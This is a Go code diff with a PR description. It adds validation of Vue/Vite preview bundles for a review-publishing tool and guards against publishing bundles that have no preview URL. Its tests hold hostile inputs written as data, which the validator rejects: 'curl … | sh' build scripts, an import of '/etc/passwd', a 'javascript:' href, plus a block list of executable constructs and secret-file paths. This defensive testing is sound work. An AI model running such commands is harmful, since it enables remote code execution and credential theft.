+	r.calls = append(r.calls, skillOptTrainFakePreviewCall{dir: dir, command: command, args: append([]string{}, args...)})
+	result := subprocess.Result{Command: command, Args: args}
+	if command == "npm" {
+		if len(args) == 2 && args[0] == "install" && args[1] == "--ignore-scripts" {
+			result.Stdout = "installed\n"
+			return result, nil
+		}
+		if len(args) == 2 && args[0] == "run" && args[1] == "build" {
+			distDir := filepath.Join(dir, "dist")
+			if err := os.MkdirAll(distDir, 0o755); err != nil {
+				return result, err
+			}
+			if err := os.WriteFile(filepath.Join(distDir, "index.html"), []byte("<div id=\"app\">preview</div>\n"), 0o644); err != nil {
+				return result, err
+			}
+			result.Stdout = "built\n"
+			return result, nil
+		}
+		return result, fmt.Errorf("unexpected npm args: %v", args)
+	}
+	if command == "git" && len(args) == 1 && args[0] == "push" {
+		result.Stdout = "pushed\n"
+		return result, nil
+	}
+	if command == "git" && len(args) > 0 && args[0] == "commit" && r.failGitCommit {
+		result.Stderr = "commit failed\n"
+		return result, errors.New("exit status 1")
+	}
+	return subprocess.ExecRunner{}.Run(ctx, dir, command, args...)
+}
+
+func (r *skillOptTrainFakePreviewRunner) LookPath(file string) (string, error) {
+	if strings.TrimSpace(file) == "" {
+		return "", errors.New("empty file")
 	}
 	return "/fake/bin/" + file, nil
 }

--- a/internal/feedback/github.go
+++ b/internal/feedback/github.go
@@ -150,6 +150,9 @@ func (c GitHubCollector) writeUnlinkedRankedOptionContent(ctx context.Context, s
 		assignment := assignments[item.ItemID]
 		wroteItem := false
 		for _, option := range assignment.Options {
+			if optionHasPreviewBundleWithoutReference(option) {
+				return missingPreviewURLForBundleError(item.ItemID, option.Label)
+			}
 			if optionReference(option, false) != "" {
 				continue
 			}

--- a/internal/feedback/github_test.go
+++ b/internal/feedback/github_test.go
@@ -216,6 +216,42 @@ func TestGitHubCollectorPublishesRankedIssueBody(t *testing.T) {
 	}
 }
 
+func TestGitHubCollectorRejectsPreviewBundleWithoutURL(t *testing.T) {
+	ctx := context.Background()
+	store, blobs := setupGitHubRankedFeedbackRun(t, "ranked-1", "owner/repo")
+	bundle, err := blobs.Put([]byte(`{"renderer":"vue-vite"}`))
+	if err != nil {
+		t.Fatalf("Put preview bundle returned error: %v", err)
+	}
+	if err := store.UpsertEvalArtifact(ctx, db.EvalArtifact{ID: "option-a", Hash: bundle.Hash, MediaType: "application/json", SizeBytes: bundle.Size, Driver: "vue-vite"}); err != nil {
+		t.Fatalf("UpsertEvalArtifact option-a returned error: %v", err)
+	}
+	if err := store.UpsertEvalReviewOption(ctx, db.EvalReviewOption{
+		RunID:        "ranked-1",
+		ItemID:       "item-001",
+		Label:        "a",
+		ArtifactID:   "option-a",
+		Role:         "option",
+		MetadataJSON: `{"preview_bundle":{"renderer":"vue-vite","files":["package.json"]}}`,
+	}); err != nil {
+		t.Fatalf("UpsertEvalReviewOption option-a returned error: %v", err)
+	}
+	fake := &fakeFeedbackGitHub{
+		issue: github.Issue{Number: 42, URL: "https://github.com/owner/repo/issues/42"},
+	}
+	collector := GitHubCollector{BlobStore: blobs, GitHub: fake}
+
+	_, err = collector.Publish(ctx, store, "ranked-1", GitHubPublishTarget{
+		Repo: github.Repository{Owner: "owner", Name: "repo"},
+	})
+	if err == nil || !strings.Contains(err.Error(), "preview_url") {
+		t.Fatalf("Publish error = %v, want preview_url", err)
+	}
+	if fake.createdIssue.Body != "" {
+		t.Fatalf("Publish created issue body despite missing preview URL:\n%s", fake.createdIssue.Body)
+	}
+}
+
 func TestGitHubCollectorYAMLTemplateHandlesSpecialIDs(t *testing.T) {
 	ctx := context.Background()
 	store, blobs := setupGitHubFeedbackRunWithItem(t, "run: 1 # x", "- item: 001", "owner/repo")
@@ -534,7 +570,7 @@ func setupGitHubRankedFeedbackRunWithItem(t *testing.T, runID string, itemID str
 		}
 		metadata := `{"path":"/tmp/gitmoot-option-` + label + `.md"}`
 		if label == "c" {
-			metadata = `{"preview_url":"https://example.com/c"}`
+			metadata = `{"preview_url":"https://example.com/c","preview_bundle":{"renderer":"vue-vite","files":["package.json"]}}`
 		}
 		if err := store.UpsertEvalReviewOption(ctx, db.EvalReviewOption{RunID: runID, ItemID: itemID, Label: label, ArtifactID: artifactID, Role: "option", MetadataJSON: metadata}); err != nil {
 			t.Fatalf("UpsertEvalReviewOption %s returned error: %v", label, err)

--- a/internal/feedback/markdown.go
+++ b/internal/feedback/markdown.go
@@ -263,6 +263,13 @@ func (c MarkdownCollector) writeRankedItem(ctx context.Context, store *db.Store,
 	builder.WriteString("Rank every option in `../feedback.yml` from best to worst. Use the option labels exactly as shown here.\n\n")
 	writeOptionReferenceTable(&builder, assignment.Options)
 	for _, option := range assignment.Options {
+		if optionHasPreviewBundleWithoutReference(option) {
+			return missingPreviewURLForBundleError(item.ItemID, option.Label)
+		}
+		if optionHasPreviewBundle(option) {
+			fmt.Fprintf(&builder, "\n## Option %s\n\nReference: %s\n", displayOptionLabel(option.Label), optionReference(option, true))
+			continue
+		}
 		content, err := c.optionText(ctx, store, option.ArtifactID)
 		if err != nil {
 			return fmt.Errorf("item %s option %s: %w", item.ItemID, option.Label, err)
@@ -751,19 +758,58 @@ func writeOptionReferenceTableWithLocalPaths(builder *strings.Builder, options [
 }
 
 func optionReference(option blindOptionAssignment, includeLocalPaths bool) string {
-	metadata := map[string]string{}
-	if strings.TrimSpace(option.MetadataJSON) != "" {
-		_ = json.Unmarshal([]byte(option.MetadataJSON), &metadata)
-	}
+	metadata := optionMetadata(option)
 	for _, key := range []string{"preview_url", "url"} {
-		if value := strings.TrimSpace(metadata[key]); value != "" {
+		if value := metadataString(metadata, key); value != "" {
 			return fmt.Sprintf("[open](%s)", value)
 		}
 	}
-	if path := strings.TrimSpace(metadata["path"]); includeLocalPaths && path != "" {
+	if path := metadataString(metadata, "path"); includeLocalPaths && path != "" {
 		return "`" + strings.ReplaceAll(path, "`", "") + "`"
 	}
 	return ""
+}
+
+func optionHasPreviewBundleWithoutReference(option blindOptionAssignment) bool {
+	if !optionHasPreviewBundle(option) {
+		return false
+	}
+	metadata := optionMetadata(option)
+	for _, key := range []string{"preview_url", "url"} {
+		if metadataString(metadata, key) != "" {
+			return false
+		}
+	}
+	return true
+}
+
+func optionHasPreviewBundle(option blindOptionAssignment) bool {
+	metadata := optionMetadata(option)
+	if metadata["preview_bundle"] == nil {
+		return false
+	}
+	return true
+}
+
+func missingPreviewURLForBundleError(itemID string, label string) error {
+	return fmt.Errorf("item %s option %s has a preview bundle but no preview_url; publish previews before publishing a feedback packet", itemID, displayOptionLabel(label))
+}
+
+func optionMetadata(option blindOptionAssignment) map[string]any {
+	metadata := map[string]any{}
+	if strings.TrimSpace(option.MetadataJSON) != "" {
+		_ = json.Unmarshal([]byte(option.MetadataJSON), &metadata)
+	}
+	return metadata
+}
+
+func metadataString(metadata map[string]any, key string) string {
+	switch value := metadata[key].(type) {
+	case string:
+		return strings.TrimSpace(value)
+	default:
+		return ""
+	}
 }
 
 func writeFeedbackYAML(path string, runID string, assignments assignmentFile) error {

--- a/internal/feedback/markdown_test.go
+++ b/internal/feedback/markdown_test.go
@@ -471,6 +471,72 @@ func TestMarkdownCollectorRejectsIdenticalABItems(t *testing.T) {
 	}
 }
 
+func TestMarkdownCollectorRejectsPreviewBundleWithoutURL(t *testing.T) {
+	ctx := context.Background()
+	store, blobs := setupMarkdownRankedFeedbackRun(t, "ranked-1")
+	bundle, err := blobs.Put([]byte(`{"renderer":"vue-vite"}`))
+	if err != nil {
+		t.Fatalf("Put preview bundle returned error: %v", err)
+	}
+	if err := store.UpsertEvalArtifact(ctx, db.EvalArtifact{ID: "option-a", Hash: bundle.Hash, MediaType: "application/json", SizeBytes: bundle.Size, Driver: "vue-vite"}); err != nil {
+		t.Fatalf("UpsertEvalArtifact option-a returned error: %v", err)
+	}
+	if err := store.UpsertEvalReviewOption(ctx, db.EvalReviewOption{
+		RunID:        "ranked-1",
+		ItemID:       "item-001",
+		Label:        "a",
+		ArtifactID:   "option-a",
+		Role:         "option",
+		MetadataJSON: `{"preview_bundle":{"renderer":"vue-vite","files":["package.json"]}}`,
+	}); err != nil {
+		t.Fatalf("UpsertEvalReviewOption option-a returned error: %v", err)
+	}
+	collector := MarkdownCollector{BlobStore: blobs}
+
+	err = collector.WritePacket(ctx, store, "ranked-1", filepath.Join(t.TempDir(), "packet"))
+	if err == nil || !strings.Contains(err.Error(), "preview_url") {
+		t.Fatalf("WritePacket error = %v, want preview_url", err)
+	}
+}
+
+func TestMarkdownCollectorLinksPreviewBundleWithURL(t *testing.T) {
+	ctx := context.Background()
+	store, blobs := setupMarkdownRankedFeedbackRun(t, "ranked-1")
+	bundle, err := blobs.Put([]byte(`{"renderer":"vue-vite"}`))
+	if err != nil {
+		t.Fatalf("Put preview bundle returned error: %v", err)
+	}
+	if err := store.UpsertEvalArtifact(ctx, db.EvalArtifact{ID: "option-a", Hash: bundle.Hash, MediaType: "application/json", SizeBytes: bundle.Size, Driver: "vue-vite"}); err != nil {
+		t.Fatalf("UpsertEvalArtifact option-a returned error: %v", err)
+	}
+	if err := store.UpsertEvalReviewOption(ctx, db.EvalReviewOption{
+		RunID:        "ranked-1",
+		ItemID:       "item-001",
+		Label:        "a",
+		ArtifactID:   "option-a",
+		Role:         "option",
+		MetadataJSON: `{"preview_url":"https://example.com/a","preview_bundle":{"renderer":"vue-vite","files":["package.json"]}}`,
+	}); err != nil {
+		t.Fatalf("UpsertEvalReviewOption option-a returned error: %v", err)
+	}
+	packetDir := filepath.Join(t.TempDir(), "packet")
+	collector := MarkdownCollector{BlobStore: blobs}
+
+	if err := collector.WritePacket(ctx, store, "ranked-1", packetDir); err != nil {
+		t.Fatalf("WritePacket returned error: %v", err)
+	}
+	itemContent, err := os.ReadFile(filepath.Join(packetDir, "items", itemFilename("item-001")))
+	if err != nil {
+		t.Fatalf("read ranked item: %v", err)
+	}
+	if !strings.Contains(string(itemContent), "Reference: [open](https://example.com/a)") {
+		t.Fatalf("ranked item missing preview reference:\n%s", string(itemContent))
+	}
+	if strings.Contains(string(itemContent), `"renderer":"vue-vite"`) {
+		t.Fatalf("ranked item inlined preview bundle:\n%s", string(itemContent))
+	}
+}
+
 func TestMarkdownCollectorRejectsPacketWithoutStoredRun(t *testing.T) {
 	ctx := context.Background()
 	store, err := db.Open(filepath.Join(t.TempDir(), "gitmoot.db"))

--- a/internal/skillopt/preview_bundle.go
+++ b/internal/skillopt/preview_bundle.go
@@ -1,0 +1,240 @@
+package skillopt
+
+import (
+	"bytes"
+	"encoding/json"
+	"errors"
+	"fmt"
+	"io"
+	"path"
+	"strings"
+)
+
+const previewBundleRendererVueVite = TrainPreviewRendererVueVite
+const previewBundleBuildCommand = "npm run build"
+const previewBundlePackageBuildScript = "vite build"
+const previewBundleDistDir = "dist"
+const previewBundleTrustedIndexHTML = `<div id="app"></div><script type="module" src="/src/main.js"></script>`
+const previewBundleTrustedMainJS = `import { createApp } from 'vue'; import App from './App.vue'; createApp(App).mount('#app');`
+
+type PreviewBundle struct {
+	Renderer     string              `json:"renderer"`
+	Files        []PreviewBundleFile `json:"files"`
+	BuildCommand string              `json:"build_command"`
+	DistDir      string              `json:"dist_dir"`
+}
+
+type PreviewBundleFile struct {
+	Path    string `json:"path"`
+	Content string `json:"content"`
+}
+
+type PreviewBundleMetadata struct {
+	Renderer     string   `json:"renderer"`
+	FileCount    int      `json:"file_count"`
+	Files        []string `json:"files"`
+	BuildCommand string   `json:"build_command"`
+	DistDir      string   `json:"dist_dir"`
+}
+
+func ParsePreviewBundle(content []byte) (PreviewBundle, error) {
+	if len(bytes.TrimSpace(content)) == 0 {
+		return PreviewBundle{}, errors.New("preview bundle JSON is required")
+	}
+	decoder := json.NewDecoder(bytes.NewReader(content))
+	decoder.DisallowUnknownFields()
+	var bundle PreviewBundle
+	if err := decoder.Decode(&bundle); err != nil {
+		return PreviewBundle{}, fmt.Errorf("decode preview bundle JSON: %w", err)
+	}
+	if err := decoder.Decode(&struct{}{}); err != io.EOF {
+		return PreviewBundle{}, errors.New("preview bundle JSON must contain exactly one object")
+	}
+	return validatePreviewBundle(bundle)
+}
+
+func (b PreviewBundle) Metadata() PreviewBundleMetadata {
+	files := make([]string, 0, len(b.Files))
+	for _, file := range b.Files {
+		files = append(files, file.Path)
+	}
+	return PreviewBundleMetadata{
+		Renderer:     b.Renderer,
+		FileCount:    len(b.Files),
+		Files:        files,
+		BuildCommand: b.BuildCommand,
+		DistDir:      b.DistDir,
+	}
+}
+
+func validatePreviewBundle(bundle PreviewBundle) (PreviewBundle, error) {
+	bundle.Renderer = strings.TrimSpace(strings.ToLower(bundle.Renderer))
+	if bundle.Renderer == "" {
+		return PreviewBundle{}, errors.New("preview bundle renderer is required")
+	}
+	if bundle.Renderer != previewBundleRendererVueVite {
+		return PreviewBundle{}, fmt.Errorf("preview bundle renderer %q is not supported", bundle.Renderer)
+	}
+	bundle.BuildCommand = strings.TrimSpace(bundle.BuildCommand)
+	if bundle.BuildCommand == "" {
+		return PreviewBundle{}, errors.New("preview bundle build_command is required")
+	}
+	if bundle.BuildCommand != previewBundleBuildCommand {
+		return PreviewBundle{}, fmt.Errorf("preview bundle build_command must be %q", previewBundleBuildCommand)
+	}
+	distDir, err := normalizePreviewBundlePath("dist_dir", bundle.DistDir)
+	if err != nil {
+		return PreviewBundle{}, err
+	}
+	bundle.DistDir = distDir
+	if bundle.DistDir != previewBundleDistDir {
+		return PreviewBundle{}, fmt.Errorf("preview bundle dist_dir must be %q", previewBundleDistDir)
+	}
+	if previewBundlePathHasSegment(distDir, "node_modules") || previewBundlePathHasSegment(distDir, ".git") || previewBundlePathIsSensitive(distDir) {
+		return PreviewBundle{}, fmt.Errorf("preview bundle dist_dir %q must not point at dependency caches, git metadata, or secret/config credential paths", distDir)
+	}
+	if len(bundle.Files) == 0 {
+		return PreviewBundle{}, errors.New("preview bundle files are required")
+	}
+	seen := map[string]struct{}{}
+	required := map[string]bool{
+		"package.json": false,
+		"index.html":   false,
+		"src/main.js":  false,
+		"src/App.vue":  false,
+	}
+	for index, file := range bundle.Files {
+		normalizedPath, err := normalizePreviewBundlePath("file path", file.Path)
+		if err != nil {
+			return PreviewBundle{}, fmt.Errorf("preview bundle file %d: %w", index+1, err)
+		}
+		if previewBundlePathHasSegment(normalizedPath, "node_modules") || previewBundlePathHasSegment(normalizedPath, ".git") {
+			return PreviewBundle{}, fmt.Errorf("preview bundle file path %q must not include dependency caches or git metadata", normalizedPath)
+		}
+		if previewBundlePathIsSensitive(normalizedPath) {
+			return PreviewBundle{}, fmt.Errorf("preview bundle file path %q looks like a secret/config credential file", normalizedPath)
+		}
+		if normalizedPath == distDir || strings.HasPrefix(normalizedPath, distDir+"/") {
+			return PreviewBundle{}, fmt.Errorf("preview bundle file path %q must not include built output", normalizedPath)
+		}
+		if strings.TrimSpace(file.Content) == "" {
+			return PreviewBundle{}, fmt.Errorf("preview bundle file %q content is required", normalizedPath)
+		}
+		if normalizedPath == "package.json" {
+			if err := validatePreviewBundlePackageJSON(file.Content); err != nil {
+				return PreviewBundle{}, err
+			}
+		}
+		if normalizedPath == "index.html" && strings.TrimSpace(file.Content) != previewBundleTrustedIndexHTML {
+			return PreviewBundle{}, errors.New("preview bundle index.html must use the trusted Gitmoot Vue mount scaffold")
+		}
+		if normalizedPath == "src/main.js" && strings.TrimSpace(file.Content) != previewBundleTrustedMainJS {
+			return PreviewBundle{}, errors.New("preview bundle src/main.js must use the trusted Gitmoot Vue bootstrap")
+		}
+		if normalizedPath == "src/App.vue" {
+			if err := validatePreviewBundleAppVue(file.Content); err != nil {
+				return PreviewBundle{}, err
+			}
+		}
+		if _, ok := seen[normalizedPath]; ok {
+			return PreviewBundle{}, fmt.Errorf("preview bundle file path %q is duplicated", normalizedPath)
+		}
+		if _, ok := required[normalizedPath]; !ok {
+			return PreviewBundle{}, fmt.Errorf("preview bundle file path %q is not supported", normalizedPath)
+		}
+		seen[normalizedPath] = struct{}{}
+		if _, ok := required[normalizedPath]; ok {
+			required[normalizedPath] = true
+		}
+		bundle.Files[index].Path = normalizedPath
+	}
+	for file, ok := range required {
+		if !ok {
+			return PreviewBundle{}, fmt.Errorf("preview bundle missing required file %q", file)
+		}
+	}
+	return bundle, nil
+}
+
+func normalizePreviewBundlePath(kind string, value string) (string, error) {
+	value = strings.TrimSpace(value)
+	if value == "" {
+		return "", fmt.Errorf("preview bundle %s is required", kind)
+	}
+	if strings.Contains(value, "\\") {
+		return "", fmt.Errorf("preview bundle %s %q must use slash-separated relative paths", kind, value)
+	}
+	if strings.Contains(value, ":") {
+		return "", fmt.Errorf("preview bundle %s %q must not include drive-qualified or URL-like paths", kind, value)
+	}
+	if strings.HasPrefix(value, "/") {
+		return "", fmt.Errorf("preview bundle %s %q must be relative", kind, value)
+	}
+	normalized := path.Clean(value)
+	if normalized == "." || normalized == ".." || strings.HasPrefix(normalized, "../") {
+		return "", fmt.Errorf("preview bundle %s %q must not traverse directories", kind, value)
+	}
+	return normalized, nil
+}
+
+func validatePreviewBundlePackageJSON(content string) error {
+	var pkg struct {
+		Scripts         map[string]string `json:"scripts"`
+		Dependencies    map[string]string `json:"dependencies"`
+		DevDependencies map[string]string `json:"devDependencies"`
+	}
+	if err := json.Unmarshal([]byte(content), &pkg); err != nil {
+		return fmt.Errorf("preview bundle package.json: %w", err)
+	}
+	if strings.TrimSpace(pkg.Scripts["build"]) != previewBundlePackageBuildScript {
+		return fmt.Errorf("preview bundle package.json scripts.build must be %q", previewBundlePackageBuildScript)
+	}
+	for name := range pkg.Scripts {
+		if strings.TrimSpace(name) != "build" {
+			return errors.New("preview bundle package.json scripts may only include build")
+		}
+	}
+	if len(pkg.Dependencies) > 0 || len(pkg.DevDependencies) > 0 {
+		return errors.New("preview bundle package.json dependencies are supplied by Gitmoot and must not be included")
+	}
+	return nil
+}
+
+func validatePreviewBundleAppVue(content string) error {
+	lower := strings.ToLower(content)
+	for _, blocked := range []string{
+		"<script", "</script", "import ", "require(", "import.meta", "@import", "url(",
+		"<iframe", "<object", "<embed", "<link", " src=", " srcset=", " href=", " xlink:href=",
+		"http://", "https://", "javascript:", "data:",
+	} {
+		if strings.Contains(lower, blocked) {
+			return fmt.Errorf("preview bundle src/App.vue must not include executable or external-loading construct %q", blocked)
+		}
+	}
+	if !strings.Contains(lower, "<template") || !strings.Contains(lower, "</template>") {
+		return errors.New("preview bundle src/App.vue must include a template")
+	}
+	return nil
+}
+
+func previewBundlePathHasSegment(value string, segment string) bool {
+	for _, part := range strings.Split(value, "/") {
+		if part == segment {
+			return true
+		}
+	}
+	return false
+}
+
+func previewBundlePathIsSensitive(value string) bool {
+	for _, part := range strings.Split(value, "/") {
+		name := strings.ToLower(path.Base(part))
+		if name == ".env" || strings.HasPrefix(name, ".env.") || name == ".npmrc" || name == ".yarnrc" {
+			return true
+		}
+		if strings.Contains(name, "secret") || strings.Contains(name, "credential") {
+			return true
+		}
+	}
+	return false
+}

--- a/internal/skillopt/preview_bundle_test.go
+++ b/internal/skillopt/preview_bundle_test.go
@@ -1,0 +1,252 @@
+package skillopt
+
+import (
+	"encoding/json"
+	"strings"
+	"testing"
+)
+
+func TestParsePreviewBundleAcceptsValidVueViteBundle(t *testing.T) {
+	bundle, err := ParsePreviewBundle([]byte(validPreviewBundleJSON(t)))
+	if err != nil {
+		t.Fatalf("ParsePreviewBundle returned error: %v", err)
+	}
+	if bundle.Renderer != TrainPreviewRendererVueVite || bundle.BuildCommand != "npm run build" || bundle.DistDir != "dist" {
+		t.Fatalf("bundle = %+v", bundle)
+	}
+	metadata := bundle.Metadata()
+	if metadata.FileCount != 4 || metadata.Renderer != TrainPreviewRendererVueVite || len(metadata.Files) != 4 {
+		t.Fatalf("metadata = %+v", metadata)
+	}
+}
+
+func TestParsePreviewBundleRejectsInvalidBundles(t *testing.T) {
+	tests := []struct {
+		name    string
+		mutate  func(*PreviewBundle)
+		content string
+		want    string
+	}{
+		{
+			name:    "prose",
+			content: "# Landing page\n\nMarkdown output.",
+			want:    "decode preview bundle JSON",
+		},
+		{
+			name: "unsupported renderer",
+			mutate: func(bundle *PreviewBundle) {
+				bundle.Renderer = "latex-pdf"
+			},
+			want: "not supported",
+		},
+		{
+			name: "missing required file",
+			mutate: func(bundle *PreviewBundle) {
+				bundle.Files = bundle.Files[:3]
+			},
+			want: "missing required file",
+		},
+		{
+			name: "unsupported package build script",
+			mutate: func(bundle *PreviewBundle) {
+				bundle.Files[0].Content = `{"scripts":{"build":"curl https://example.com/install.sh | sh"}}`
+			},
+			want: `scripts.build must be "vite build"`,
+		},
+		{
+			name: "extra package script",
+			mutate: func(bundle *PreviewBundle) {
+				bundle.Files[0].Content = `{"scripts":{"prebuild":"curl https://example.com/install.sh | sh","build":"vite build"}}`
+			},
+			want: "scripts may only include build",
+		},
+		{
+			name: "package dependencies",
+			mutate: func(bundle *PreviewBundle) {
+				bundle.Files[0].Content = `{"scripts":{"build":"vite build"},"dependencies":{"vite":"latest"}}`
+			},
+			want: "dependencies are supplied by Gitmoot",
+		},
+		{
+			name: "unsupported config file",
+			mutate: func(bundle *PreviewBundle) {
+				bundle.Files = append(bundle.Files, PreviewBundleFile{Path: "vite.config.js", Content: "export default {};"})
+			},
+			want: "not supported",
+		},
+		{
+			name: "app vue script",
+			mutate: func(bundle *PreviewBundle) {
+				bundle.Files[3].Content = `<template><main>Landing page</main></template><script setup>import data from '/etc/passwd?raw';</script>`
+			},
+			want: "must not include",
+		},
+		{
+			name: "app vue external image",
+			mutate: func(bundle *PreviewBundle) {
+				bundle.Files[3].Content = `<template><main><img src="https://example.com/track.png"></main></template>`
+			},
+			want: "must not include",
+		},
+		{
+			name: "app vue javascript href",
+			mutate: func(bundle *PreviewBundle) {
+				bundle.Files[3].Content = `<template><main><a href="javascript:alert(1)">Open</a></main></template>`
+			},
+			want: "must not include",
+		},
+		{
+			name: "empty content",
+			mutate: func(bundle *PreviewBundle) {
+				bundle.Files[0].Content = " \n"
+			},
+			want: "content is required",
+		},
+		{
+			name: "unsafe absolute path",
+			mutate: func(bundle *PreviewBundle) {
+				bundle.Files[0].Path = "/tmp/package.json"
+			},
+			want: "must be relative",
+		},
+		{
+			name: "path traversal",
+			mutate: func(bundle *PreviewBundle) {
+				bundle.Files[0].Path = "../package.json"
+			},
+			want: "must not traverse",
+		},
+		{
+			name: "windows drive path",
+			mutate: func(bundle *PreviewBundle) {
+				bundle.Files[0].Path = "C:/Users/alice/package.json"
+			},
+			want: "drive-qualified",
+		},
+		{
+			name: "dependency cache",
+			mutate: func(bundle *PreviewBundle) {
+				bundle.Files[0].Path = "node_modules/vue/index.js"
+			},
+			want: "dependency caches",
+		},
+		{
+			name: "built output",
+			mutate: func(bundle *PreviewBundle) {
+				bundle.Files[0].Path = "dist/index.html"
+			},
+			want: "built output",
+		},
+		{
+			name: "missing build command",
+			mutate: func(bundle *PreviewBundle) {
+				bundle.BuildCommand = ""
+			},
+			want: "build_command is required",
+		},
+		{
+			name: "unsupported build command",
+			mutate: func(bundle *PreviewBundle) {
+				bundle.BuildCommand = "curl https://example.com/install.sh | sh"
+			},
+			want: `build_command must be "npm run build"`,
+		},
+		{
+			name: "missing dist dir",
+			mutate: func(bundle *PreviewBundle) {
+				bundle.DistDir = ""
+			},
+			want: "dist_dir is required",
+		},
+		{
+			name: "unsafe dist dir",
+			mutate: func(bundle *PreviewBundle) {
+				bundle.DistDir = "node_modules/.cache/dist"
+			},
+			want: "dist_dir",
+		},
+		{
+			name: "unsupported dist dir",
+			mutate: func(bundle *PreviewBundle) {
+				bundle.DistDir = "build"
+			},
+			want: `dist_dir must be "dist"`,
+		},
+		{
+			name: "secret path",
+			mutate: func(bundle *PreviewBundle) {
+				bundle.Files[0].Path = ".env"
+			},
+			want: "secret",
+		},
+		{
+			name: "uppercase secret path",
+			mutate: func(bundle *PreviewBundle) {
+				bundle.Files[0].Path = ".NPMRC"
+			},
+			want: "secret",
+		},
+		{
+			name: "secret directory",
+			mutate: func(bundle *PreviewBundle) {
+				bundle.Files[0].Path = "secrets/api.js"
+			},
+			want: "secret",
+		},
+		{
+			name: "env directory",
+			mutate: func(bundle *PreviewBundle) {
+				bundle.Files[0].Path = ".env/local.js"
+			},
+			want: "secret",
+		},
+		{
+			name: "credential directory",
+			mutate: func(bundle *PreviewBundle) {
+				bundle.Files[0].Path = "credentials/aws.json"
+			},
+			want: "secret",
+		},
+	}
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			content := tt.content
+			if content == "" {
+				bundle := validPreviewBundle(t)
+				tt.mutate(&bundle)
+				encoded, err := json.Marshal(bundle)
+				if err != nil {
+					t.Fatalf("Marshal mutated bundle returned error: %v", err)
+				}
+				content = string(encoded)
+			}
+			if _, err := ParsePreviewBundle([]byte(content)); err == nil || !strings.Contains(err.Error(), tt.want) {
+				t.Fatalf("ParsePreviewBundle error = %v, want %q", err, tt.want)
+			}
+		})
+	}
+}
+
+func validPreviewBundleJSON(t *testing.T) string {
+	t.Helper()
+	encoded, err := json.Marshal(validPreviewBundle(t))
+	if err != nil {
+		t.Fatalf("Marshal valid preview bundle returned error: %v", err)
+	}
+	return string(encoded)
+}
+
+func validPreviewBundle(t *testing.T) PreviewBundle {
+	t.Helper()
+	return PreviewBundle{
+		Renderer:     TrainPreviewRendererVueVite,
+		BuildCommand: "npm run build",
+		DistDir:      "dist",
+		Files: []PreviewBundleFile{
+			{Path: "package.json", Content: `{"scripts":{"build":"vite build"}}`},
+			{Path: "index.html", Content: `<div id="app"></div><script type="module" src="/src/main.js"></script>`},
+			{Path: "src/main.js", Content: `import { createApp } from 'vue'; import App from './App.vue'; createApp(App).mount('#app');`},
+			{Path: "src/App.vue", Content: `<template><main>Landing page</main></template>`},
+		},
+	}
+}


### PR DESCRIPTION
WHAT

Adds the Vue/Vite preview bundle contract and wires SkillOpt train preview publication through the review issue flow.

WHY

Landing-page train runs with `--preview-repo` need real preview URLs before human review packets are published. The parser-only Task 3 shape could still produce raw bundle/code-block review packets, so this branch completes the minimal end-to-end Vue preview path needed for a clean review gate.

CHANGES

- Added `skillopt.ParsePreviewBundle` validation for the Vue/Vite bundle contract.
- Updated train generation prompts and option persistence for required/optional Vue preview bundles.
- Added GitHub Pages preview publishing from registered preview repo checkouts with deterministic routes.
- Added review issue publication from `options_generated -> review_published` with preview URLs.
- Added optional-mode inline fallback conversion when preview publishing is unavailable.
- Added feedback collector guards so preview bundles without URLs are not published as raw JSON.
- Hardened generated preview builds with trusted Vite scaffold, scriptless App.vue validation, route slugging, relative Vite base, dirty checkout checks, push rollback, and review publication recovery/locking.

RESULTS

- `GOTOOLCHAIN=go1.26.2 go test ./internal/skillopt`
- `GOTOOLCHAIN=go1.26.2 go test ./internal/feedback`
- `GOTOOLCHAIN=go1.26.2 go test ./internal/cli -run 'SkillOptTrain.*Continue|SkillOptTrain.*Preview|SkillOptTrain.*Generate|SkillOptPreviewRoute|TrustedVueVite|SkillOptGitHubPagesURL|PublishGitHubPagesPreview|SkillOptFeedbackGitHub'`
- `GOTOOLCHAIN=go1.26.2 go test ./...`
- `git diff --check`

Final raw review output:

```text
No findings in the uncommitted changes.

Verified:
- `GOTOOLCHAIN=go1.26.2 go test ./internal/skillopt`
- `GOTOOLCHAIN=go1.26.2 go test ./internal/feedback`
- `GOTOOLCHAIN=go1.26.2 go test ./internal/cli -run 'SkillOptTrain|PreviewBundle'`
- `git diff --check`

Residual risk: I did not run the full `go test ./...`; the review was focused on the touched SkillOpt, feedback, and preview-bundle paths.
```

RISK

The final review did not run the full suite itself, but I ran `GOTOOLCHAIN=go1.26.2 go test ./...` successfully after the last fixes. The branch intentionally covers more than the original parser-only Task 3 because review findings showed preview URL publication was required to avoid raw bundle review packets.
